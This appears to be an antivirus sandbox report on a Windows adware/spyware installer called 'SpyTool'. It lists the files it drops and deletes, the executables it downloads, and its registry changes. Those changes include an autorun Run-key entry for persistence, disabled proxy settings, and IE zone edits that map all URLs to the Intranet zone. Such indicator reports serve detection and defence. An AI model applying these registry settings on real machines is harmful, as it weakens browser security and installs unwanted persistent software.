%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3C.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\vos[1].htm (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\policyname[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (365499 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (0 bytes)
The process nsd41.tmp:816 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse43.tmp (0 bytes)
The process nsk6.tmp:496 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq8.tmp (0 bytes)
The process nsqA.tmp:508 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrD.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nscC.tmp (0 bytes)
Registry activity
The process upgmsd_re_005010096.exe:1928 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "BCAF20B8-5919-4396-B056-12146139373A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 5E 27 6F EF D3 7C C8 B2 D2 1E 06 06 27 C0 E4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Tutorials\updatetutorialeshp]
"MainDir" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsk3C.tmp:192 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 0F 66 A5 C1 94 7A 5E AD B3 71 DF ED B5 9C C0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-6JM0V.tmp]
"nsx27.tmp"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-8964"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9217"
"SHELL32.dll,-9319"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9216"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"nsk3C.tmp"
"nsb2E.tmp"
The process gmsd_re_005010096.exe:740 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF EC C4 AC 7E 75 7B F9 15 72 B5 EE AB 35 70 62"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process nsk15.tmp:1340 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 9C 87 EC 01 7C 2B B2 E2 DF F3 52 32 E5 DE C9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsj35.tmp:588 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "som"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 C4 1D 07 D2 6D 30 14 9E 08 98 FA 9E 9F 7D 3E"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The SpyTool modifies IE security-zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security-zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security-zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsb2E.tmp:908 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
